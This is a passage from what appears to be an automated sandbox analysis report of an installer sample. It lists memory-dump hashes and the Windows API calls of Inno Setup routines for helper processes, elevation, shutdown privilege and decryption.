                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                              • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                              • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                              • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                              • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                              • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                              • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                              • Instruction ID: 3a42617683b163d9d3e29dc322e321d1f787465d7b697eb1a78dfeb7447b1e7e
                                                              • Opcode Fuzzy Hash: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                              • Instruction Fuzzy Hash: CB518574E042099FEB01EFA9C892AAEBBF5EF49314F50417AE500E7351DB389D45CB98
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047DC20,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DBDA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 626452242-0
                                                              • Opcode ID: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                              • Instruction ID: a4a2cf2857c8d8ea8b604d5a3bb359359cf50968c17c86877c7e7666634e0114
                                                              • Opcode Fuzzy Hash: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                              • Instruction Fuzzy Hash: 79519C30A04248AFDB20DF65D8C5BAABBB8EB18304F118077E804A73A1D778AD45CB59
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                              • Instruction ID: 6bd7adec2090487eae29abc1928bf57af59456791c97a49d6ef8c5917aacc84c
                                                              • Opcode Fuzzy Hash: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                              • Instruction Fuzzy Hash: 0E1148742007069BC710DF19D880B86FBE5EB98390B10C53BE9588B385D374E8558BA9
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,00453019), ref: 00452FFB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                              • Instruction ID: 3702fe8876d82bde104835ae14f19b545f9b4323f369928b31ff8c7c86e788f0
                                                              • Opcode Fuzzy Hash: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                              • Instruction Fuzzy Hash: 32014C356043086A8B10CF69AC004AEFBE8DB4D7217108277FC14D3382DA744E0496E4
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000026A8,000066AB,00401973), ref: 00401766
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                              • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                              • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                              • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                              • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                              • Opcode Fuzzy Hash: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                              • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                              • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                              • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                              • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                              • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                              • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                              • API String ID: 2323315520-3614243559
                                                              • Opcode ID: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                              • Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
                                                              • Opcode Fuzzy Hash: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                              • Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00458993
                                                              • QueryPerformanceCounter.KERNEL32(02113858,00000000,00458C26,?,?,02113858,00000000,?,00459322,?,02113858,00000000), ref: 0045899C
                                                              • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 004589A6
                                                              • GetCurrentProcessId.KERNEL32(?,02113858,00000000,00458C26,?,?,02113858,00000000,?,00459322,?,02113858,00000000), ref: 004589AF
                                                              • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
                                                              • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 00458A33
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
                                                              • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
                                                                • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
                                                              • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
                                                              • CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
                                                                • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                              • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                              • API String ID: 770386003-3271284199
                                                              • Opcode ID: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                              • Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
                                                              • Opcode Fuzzy Hash: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                              • Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                              APIs
                                                                • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 004782E8
                                                                • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02112BD8,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                              • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                              • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                              • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                              • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                              • API String ID: 883996979-221126205
                                                              • Opcode ID: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                              • Instruction ID: be90243bdd9c3757315ff9bbcfcad83cd6a8df60a98d136a70e83fac94f3d3e4
                                                              • Opcode Fuzzy Hash: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                              • Instruction Fuzzy Hash: E0314670A40609BEDB11EFAAD845ADEB6B8EF05314F50847FF518E7281DB7C89058B19
                                                              APIs
                                                              • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                              • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: MessageSendShowWindow
                                                              • String ID:
                                                              • API String ID: 1631623395-0
                                                              • Opcode ID: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                              • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                              • Opcode Fuzzy Hash: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                              • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 004183A3
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                              • GetWindowRect.USER32(?), ref: 004183DC
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                              • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                              • ScreenToClient.USER32(00000000), ref: 00418408
                                                              • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                              • String ID: ,
                                                              • API String ID: 2266315723-3772416878
                                                              • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                              • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                              • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                              • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 107509674-3733053543
                                                              • Opcode ID: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                              • Instruction ID: f0f78ca649e8ddc1473c2e21848b41e7847a09c75f53dffa28e6f5675cd8c776
                                                              • Opcode Fuzzy Hash: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                              • Instruction Fuzzy Hash: 32F0F670284B42B9E610AA758C13F3B21C89B40B49F80083EBD09EA1C3D7BDC80C4A2F
                                                              APIs
                                                              • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D4F5
                                                              • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D505
                                                              • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D515
                                                              • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F47B,00000000,0047F4A4), ref: 0045D53A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CryptVersion
                                                              • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                              • API String ID: 1951258720-508647305
                                                              • Opcode ID: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                              • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                              • Opcode Fuzzy Hash: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                              • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                              • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
